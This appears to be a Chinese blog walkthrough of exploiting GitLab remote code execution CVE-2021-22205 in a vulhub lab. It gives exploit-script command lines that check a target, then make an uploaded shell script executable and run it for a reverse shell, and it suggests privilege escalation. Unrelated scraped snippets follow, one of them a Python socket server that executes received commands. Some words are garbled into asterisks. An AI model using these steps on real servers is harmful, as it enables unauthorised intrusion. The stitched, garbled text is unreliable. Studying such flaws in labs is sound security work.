GitLab 遠端命令執行

2022-10-08 20:24:23 字數 845 閱讀 8818

一、漏洞描述

gitlab 沒有正確驗證傳遞給檔案解析器的影象檔案,這導致遠端命令執行,可執行系統命令。這是乙個嚴重的問題。它現在在最新版本中得到緩解,漏洞編號cve-2021-22205。

二、影響版本

11.9 <= gitlab(ce/ee)< 13.8.8

13.9 <= gitlab(ce/ee)< 13.9.6

13.10 <= gitlab(ce/ee)< 13.10.3

三、環境搭建

快速搭建,可以使用vulhub

git clone

cd vulhub/gitlab/cve-2021-22205/

docker-compose up -d

環境啟動後,訪問http://your-ip:8080即可檢視到gitlab的登入頁面

4.2、檢測漏洞是否存在

python exploit.py -v true -t 目標ip

4.3、命令執行

由於是內網環境,本地先起乙個http服務

然後執行命令

4.4、**shell

python cve-2021-22205.py -a true -t http://目標ip -c "chmod +x /tmp/dp.sh"

開啟監聽

**shell

python cve-2021-22205.py -a true -t http://目標ip -c "/bin/bash /tmp/dp.sh"

已經**回shell,由於許可權不高可以嘗試進行提權。

五、解決方案

更新至最新版本,新版本中已修復此漏洞。

遠端執行命令

遠端執行命令 這個分兩步,很簡單很實用。第一步,設定ssh免認證,免認證就是只不用密碼認證就可以直接登入,這在寫指令碼伺服器控制時特別有用。ssh keygen t rsa cd ssh ssh copy id xuexi01注 xuexi01是主機名,也可寫成ip,如192.168.2.11 第二...

遠端執行命令

一 需求 server 下發命令 client 執行命令 ssh協議 import os ret os.popen ls read print ret import subprocess 內建模組 和os模組的功能有相似之處 能執行作業系統的命令的功能 ret subprocess.popen di...

遠端執行命令

伺服器 遠端執行命令 from socket import import subprocess ip port 127.0.0.1 8080 back log 5buffer size 1024tcp server socket af inet,sock stream tcp server.bind...